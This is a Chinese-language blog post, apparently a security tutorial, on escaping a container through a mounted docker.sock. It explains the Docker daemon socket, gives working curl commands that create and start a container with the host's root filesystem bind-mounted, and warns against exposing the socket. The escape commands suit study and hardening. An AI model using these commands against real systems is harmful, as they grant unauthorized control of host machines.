docker.sock 危险挂载逃逸

文章详细描述了一种利用docker.sock进行逃逸攻击的方法,通过在宿主机上部署后门容器,从而控制主机。作者分析了漏洞利用路径,包括检查套接字、创建和启动容器的过程。警告了docker.sock暴露的风险。
摘要由CSDN通过智能技术生成

docker.sock 危险挂载逃逸

一、漏洞简介

通过本地docker.sock向宿主机部署后门容器,以控制宿主机。

二、前置知识

docker.sock

/var/run/docker.sockDoceker Daemon默认监听的Unix域套接字,用于与容器中的进程通信。该监听操作的配置可以在/etc/default/docker中找到:

-H unix:///var/run/docker.sock

向该套接字发送的HTTP请求会转发给Docker Daemon,等同于在本地控制Docker Daemon。因此,挂载了docker.sock套接字的容器权限很高。

三、漏洞利用路径

  1. 检查docker.sock:检查路径是否存在;发送GET请求info页面
  2. 拉取镜像:向docker.sock发送POST请求“create?fromImage”
  3. 创建容器:向docker.sock发送POST请求“containers/create”,容器通过JSON配置
  4. 启动容器:向docker.sock发送POST请求“containers/“+containerID+”/start”

四、漏洞复现

漏洞复现过程:

# 在挂载了/var/run/docker.sock的容器中
# 拉取镜像
curl -i -s -k  -X 'POST' \
-H 'Content-Type: application/json' \
http://<docker_host>:PORT/images/create?fromImage=alpine&tag=latest
# 创建容器并记录返回的容器ID(container_ID)
curl -i -s -k  -X 'POST' \
-H 'Content-Type: application/json' \
--data-binary '{"Hostname": "","Domainname": "","User": "","AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Tty": true,"OpenStdin": true,"StdinOnce": true,"Entrypoint": "/bin/bash","Image": "alpine","Volumes": {"/hostos/": {}},"HostConfig": {"Binds": ["/:/hostos"]}}' \
http://<docker_host>:PORT/containers/create
# 启动容器
curl -i -s -k  -X 'POST' \
-H 'Content-Type: application/json' \
http://<docker_host>:PORT/containers/<container_ID>/start

如果是本地利用,将<docker_host>:PORT替换为localhost即可。

五、总结

将docker.sock暴露在容器中是很危险的行为,可能导致容器被利用来发起逃逸攻击以控制主机。本文分析了挂载docker.sock套接字的逃逸攻击原理和复现过程。

参考链接

  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值